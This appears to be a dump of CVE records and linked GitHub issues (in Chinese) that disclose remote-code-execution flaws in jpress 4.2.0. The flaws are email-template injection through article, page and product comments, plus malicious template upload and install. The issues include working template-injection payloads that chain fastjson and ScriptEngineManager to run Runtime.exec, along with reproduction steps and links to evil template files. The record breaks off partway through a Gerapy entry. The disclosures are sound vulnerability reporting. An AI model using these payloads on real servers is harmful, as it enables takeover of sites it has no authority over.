# 审计过程 **与之前一篇不同,之前交过一个邮件模板注入的洞,之前那个触发点是在article的评论处,这次是在page的评论处,代码很相似,但不是同一份代码** jpress后台提供了**评论邮件通知管理员**功能,而且发送的邮件模板可控,官方给出了例子,告诉我们可以用`#(comment.id)`,那么猜测这里可能会存在模板渲染问题 ![image-20211222194033904](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194033904.png) 接着,尝试发一条评论看看后端代码的执行流程,后端对应的代码是`io.jpress.module.page.controller.PageController#postComment`,这个方法的作用主要是将评论信息保存到数据库,同时还会发送短信通知网站管理员 ![image-20211222194132555](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194132555.png) 跟进`io.jpress.module.page.PageNotifyKit#notify`,发现这里定义了两种方式,一个是sms发送,一个是email,我们跟进email的 ![image-20211222194204084](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194204084.png) 发现`byEmail`方法会继续调用`doSendEmail`,这个函数里面有模板渲染操作,在第90和91行,分别对邮件的emailTitle和emailTemplate调用`getTemplateByString`进行渲染,这两个变量实际上就是最开始我们在前端页面输入的 ![image-20211222194234496](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194234496.png) 分析到这里,结合之前交过的那个article页面的邮件模板rce,应该可以直接打模板注入了 # 效果演示 首先通过弱密码进入后台 ![image-20220116142842680](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142842680.png) 然后开启这两项 ![image-20211222194424936](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194424936.png) 然后配置管理员邮箱,随便配一个,这个是收件者 ![image-20220116142900454](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142900454.png) 还得配置发送者的邮箱,**配置完记得点提交,拉到最下面点提交** ![image-20220116142913636](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142913636.png) 然后设置恶意邮件模板,**同样记得要提交** ``` #set(str=comment.content) #set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #set(sem=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #(x.addAccept(sem)) #set(json=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(x=com.alibaba.fastjson.JSON::parse(json)) #set(js=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(e=x.getEngineByName(js)) #(e.eval(str)) ``` ![image-20211222194459565](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194459565.png) 接下来,我们需要更换一个页面模板,因为默认的模板是不提供page的模板的,启用这个模板 ![image-20211222194552681](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194552681.png) 然后创建一个page,点击发布 ![image-20211222194620527](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194620527.png) 访问一下我们创建的page ![image-20211222194643914](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194643914.png) 接下来,在page页面评论如下内容 ``` javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc") ``` 发现计算器成功弹出,漏洞验证成功 ![image-20211222194714458](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222194714458.png)
jpress后台存在命令执行漏洞-邮件模板page
https://api.github.com/repos/JPressProjects/jpress/issues/171/comments
1
2022-01-09T08:53:50Z
2022-08-07T09:53:07Z
https://github.com/JPressProjects/jpress/issues/171
1,097,141,191
171
3,110
CVE-2021-46115
2022-01-26T17:15:07.730
jpress 4.2.0 is vulnerable to RCE via io.jpress.web.admin._TemplateController#doUploadFile. The admin panel provides a function through which attackers can upload templates and inject some malicious code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/169" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/JPressProjects/jpress/issues/169
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JPressProjects", "jpress" ]
# 审计过程 jpress后台存在模板上传功能,不过存在些许过滤,我们使用fastjson来辅助获取`ScriptEngineManager`,然后执行任意js代码,就可以实现rce,payload如下 ``` #set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager")) #set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}')) #set(e=x.getEngineByName("js")) #(e.eval('java.lang.Runtime.getRuntime().exec("calc")')) ``` # 效果演示 弱密码进入后台,修改上传[evil.html](http://121.5.40.245:8081/jpress/upload_template/evil.html) ![image-20211221221541437](https://user-images.githubusercontent.com/64583215/148675555-bfe6865e-e6ba-4016-8983-8399e4dc9e92.png) 访问http://localhost/evil,可以看到计算器弹出,漏洞验证成功 ![image-20211221221558381](https://user-images.githubusercontent.com/64583215/148675561-fa4baa85-14b4-4c70-bb1d-3d3c7a568c10.png)
jpress后台存在命令执行漏洞-模板上传
https://api.github.com/repos/JPressProjects/jpress/issues/169/comments
1
2022-01-09T08:49:15Z
2022-08-07T09:52:23Z
https://github.com/JPressProjects/jpress/issues/169
1,097,140,367
169
3,111
CVE-2021-46116
2022-01-26T17:15:07.780
jpress 4.2.0 is vulnerable to remote code execution via io.jpress.web.admin._TemplateController#doInstall. The admin panel provides a function through which attackers can install templates and inject some malicious code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/168" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/JPressProjects/jpress/issues/168
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JPressProjects", "jpress" ]
# 审计过程 jpress后台存在模板安装功能,攻击者可以安装恶意模板造成rce。 在页面上点击安装模板 ![image-20211222111225666](https://user-images.githubusercontent.com/64583215/148675264-e46cc7be-3430-4df5-af4e-daca0ef16ab0.png) 上传恶意模板之后,程序运行到`io.jpress.web.admin._TemplateController#doInstall`,这个函数的作用是将上传的zip文件解压,然后存到classes/webapp/templates目录下,这个目录是专门用来存储模板文件的 ![image-20211222111412481](https://user-images.githubusercontent.com/64583215/148675266-c2ab59a0-f244-4f59-8a62-0cf8bb22f979.png) 来看具体代码,`io.jpress.web.admin._TemplateController#doInstall`方法前面主要是一系列检查,检查是不是zip,文件是否已经存在等,最后来到156行,解压zip,然后这个方法就基本结束了。 ![image-20211222111513452](https://user-images.githubusercontent.com/64583215/148675277-dc38242d-cf1c-4838-b063-dffd5716d17a.png) 然后就可以看到,我们写的恶意模板已经被解压到了这个目录下 ![image-20211222111654358](https://user-images.githubusercontent.com/64583215/148675289-e3be9618-efa4-4c3f-b808-b3ed617737ac.png) 不过模板注入存在些许过滤,我们使用fastjson来辅助获取`ScriptEngineManager`,然后执行任意js代码,就可以实现rce,payload如下 ``` #set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager")) #set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}')) #set(e=x.getEngineByName("js")) #(e.eval('java.lang.Runtime.getRuntime().exec("calc")')) ``` 接下来怎么进行利用呢?看到后台这个地方存在一个模板预览功能 ![image-20211222111755310](https://user-images.githubusercontent.com/64583215/148675301-a7246b1e-4940-44f9-88ae-bd830fbddff8.png) 开启之后可以通过get传入template参数来指定使用的模板,比如这里我们指定使用`cn.jeanstudio.bonhumeur`这个模板 ![image-20211222111844615](https://user-images.githubusercontent.com/64583215/148675308-4c19cd3f-e057-4124-aff6-2d92feb23454.png) 那么,接下来就很简单了,我们只需要指定使用我们刚刚上传的恶意模板就行了 ![image-20211222112103385](https://user-images.githubusercontent.com/64583215/148675312-21bf09f6-b677-45c9-8e91-787e1b83fe93.png) # 效果演示 弱密码进入后台,安装恶意模板[evil.zip](http://121.5.40.245:8081/jpress/install_template/evil.zip) ![image-20211221230835857](https://user-images.githubusercontent.com/64583215/148675333-b179c6a4-2a21-4abf-ab6e-e97d09d75917.png) 开启模板预览功能 ![image-20211221230810885](https://user-images.githubusercontent.com/64583215/148675412-97ae3fe7-44e2-43b0-99cd-0937a3a4621a.png) 访问http://localhost/evil?template=evil,发现计算器弹出,漏洞验证成功 ![image-20211221231018816](https://user-images.githubusercontent.com/64583215/148675421-13d1cab3-83b4-4102-9d58-8461cac6d2bd.png)
jpress后台存在命令执行漏洞-模板安装
https://api.github.com/repos/JPressProjects/jpress/issues/168/comments
1
2022-01-09T08:44:35Z
2022-08-07T09:54:17Z
https://github.com/JPressProjects/jpress/issues/168
1,097,139,500
168
3,112
CVE-2021-46118
2022-01-26T17:15:07.820
jpress 4.2.0 is vulnerable to remote code execution via io.jpress.module.article.kit.ArticleNotifyKit#doSendEmail. The admin panel provides a function through which attackers can edit the email templates and inject some malicious code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/170" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/JPressProjects/jpress/issues/170
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JPressProjects", "jpress" ]
# 审计过程 jpress后台提供了**评论邮件通知管理员**功能,而且发送的邮件模板可控,官方给出了例子,告诉我们可以用`#(comment.id)`,那么猜测这里可能会存在模板渲染问题 ![image-20211222172115997](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222172115997.png) 接着,尝试发一条评论看看后端代码的执行流程 ![image-20211222172326880](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222172326880.png) 后端对应的代码是`io.jpress.module.article.controller.front.ArticleController#postComment`,这个方法的作用主要是将评论信息保存到数据库,同时还会发送短信通知网站管理员 ![image-20211222172503414](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222172503414.png) 跟进`io.jpress.module.article.kit.ArticleNotifyKit#notify`,发现这里定义了两种方式,一个是sms发送,一个是email,我们跟进email的![image-20211222172527736](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222172527736.png) 发现`byEmail`方法会继续调用`doSendEmail`,这个函数里面有模板渲染操作,在第90和91行,分别对邮件的emailTitle和emailTemplate调用`getTemplateByString`进行渲染,这两个变量实际上就是最开始我们在前端页面输入的 ![image-20211222185153191](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222185153191.png) 分析到这里应该可以直接打模板注入了,构造如下payload ``` #set(x=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager")) #set(e=x.getEngineByName("js")) #(e.eval('java.lang.Runtime.getRuntime().exec("calc")')) ``` ![image-20211222185609715](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222185609715.png) 然后随便发一条评论,这时会触发邮件发送,就会触发ssti。但是很遗憾,评论之后发现触发失败了,后端出现了报错 ![image-20211222185750683](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222185750683.png) 排查问题后发现,我们的payload被后端处理过,**payload中的引号被html编码了**,那么在模板解析的时候自然就报错了。 因此尝试不使用引号构造payload,构造出了如下payload,我们将字符串内容通过评论内容进行传入 ``` #set(str=comment.content) #set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #set(sem=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #(x.addAccept(sem)) #set(json=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(x=com.alibaba.fastjson.JSON::parse(json)) #set(js=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(e=x.getEngineByName(js)) #(e.eval(str)) ``` 因为后端在渲染模板时将comment对象传入了,所以我们可以获取comment.content,而这个值又是在评论时我们可以控制的,最终就造成了rce ![image-20211222185958926](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222185958926.png) # 效果演示 首先通过弱密码进入后台 ![image-20220116142712503](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142712503.png) 然后开启这两项 ![image-20211222190624365](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222190624365.png) 然后配置管理员邮箱,随便配一个,这个是收件者 ![image-20220116142558660](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142558660.png) 还得配置发送者的邮箱,**配置完记得点提交,拉到最下面点提交** ![image-20220116142604988](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142604988.png) 然后设置恶意邮件模板,**同样记得要提交** ``` #set(str=comment.content) #set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #set(sem=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #(x.addAccept(sem)) #set(json=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(x=com.alibaba.fastjson.JSON::parse(json)) #set(js=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(e=x.getEngineByName(js)) #(e.eval(str)) ``` ![image-20211222191226630](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222191226630.png) 接下来,随便找一篇博客在下面评论这个payload ``` javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc") ``` 发现计算器成功弹出,漏洞验证成功 ![image-20211222191723752](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222191723752.png)
jpress后台存在命令执行漏洞-邮件模板article
https://api.github.com/repos/JPressProjects/jpress/issues/170/comments
1
2022-01-09T08:52:56Z
2022-08-07T09:53:35Z
https://github.com/JPressProjects/jpress/issues/170
1,097,141,030
170
3,113
CVE-2021-46114
2022-01-26T19:15:08.290
jpress v 4.2.0 is vulnerable to RCE via io.jpress.module.product.ProductNotifyKit#doSendEmail. The admin panel provides a function through which attackers can edit the email templates and inject some malicious code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://jpress.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/172" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://jpress.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/172" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/JPressProjects/jpress/issues/172
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JPressProjects", "jpress" ]
# 审计过程 **与之前两篇不同,之前交过两个邮件模板注入的洞,一个触发点是在article的评论处,一个是在page的评论处,这次是在product的评论处,代码很相似,但不是同一份代码** jpress后台提供了**评论邮件通知管理员**功能,而且发送的邮件模板可控,官方给出了例子,告诉我们可以用`#(comment.id)`,那么猜测这里可能会存在模板渲染问题 ![image-20211222195858075](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222195858075.png) 接着,尝试发一条评论看看后端代码的执行流程,后端对应的代码是`io.jpress.module.product.controller.front.ProductController#postComment`,这个方法的作用主要是将评论信息保存到数据库,同时还会发送短信通知网站管理员 ![image-20211222195929587](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222195929587.png) 跟进`io.jpress.module.product.ProductNotifyKit#doNotifyAdministrator`,发现这里定义了两种方式,一个是sms发送,一个是email,我们跟进email的 ![image-20211222195948627](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222195948627.png) 发现`doNotifyAdministratorByEmail`方法会继续调用`doSendEmail`,这个函数里面有模板渲染操作,在第90和91行,分别对邮件的emailTitle和emailTemplate调用`getTemplateByString`进行渲染,这两个变量实际上就是最开始我们在前端页面输入的 ![image-20211222200028114](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222200028114.png) 分析到这里,结合之前交过的那个邮件模板rce,应该可以直接打模板注入了 # 效果演示 首先通过弱密码进入后台 ![image-20220116142119465](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142119465.png) 然后开启这两项 ![image-20220116142128572](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142128572.png) 然后配置管理员邮箱,随便配一个,这个是收件者 ![image-20211222190646284](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222190646284.png) 还得配置发送者的邮箱,**配置完记得点提交,拉到最下面点提交** ![image-20220116142142043](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142142043.png) 然后设置恶意邮件模板,**同样记得要提交** ``` #set(str=comment.content) #set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #set(sem=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #(x.addAccept(sem)) #set(json=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(x=com.alibaba.fastjson.JSON::parse(json)) #set(js=str.substring(0, str.indexOf(124))) #set(str=str.substring(str.indexOf(124)+1)) #set(e=x.getEngineByName(js)) #(e.eval(str)) ``` ![image-20220116142149882](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142149882.png) 然后创建一个product,点击上架 ![image-20211222200233103](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222200233103.png)![image-20211222200300076](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222200300076.png) 访问一下刚刚的商品 ![image-20220116142158890](https://gitee.com/er1cccc/pic-md/raw/master/image-20220116142158890.png) 接下来,在商品下面评论如下内容 ``` javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc") ``` ![image-20211222200353097](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222200353097.png) 发现计算器成功弹出,漏洞验证成功 ![image-20211222200405033](https://gitee.com/er1cccc/pic-md/raw/master/image-20211222200405033.png)
jpress后台存在命令执行漏洞-邮件模板product
https://api.github.com/repos/JPressProjects/jpress/issues/172/comments
1
2022-01-09T08:54:40Z
2022-08-07T09:52:47Z
https://github.com/JPressProjects/jpress/issues/172
1,097,141,322
172
3,114
CVE-2021-32849
2022-01-26T22:15:07.903
Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/197" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/217" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/197" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/217" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": 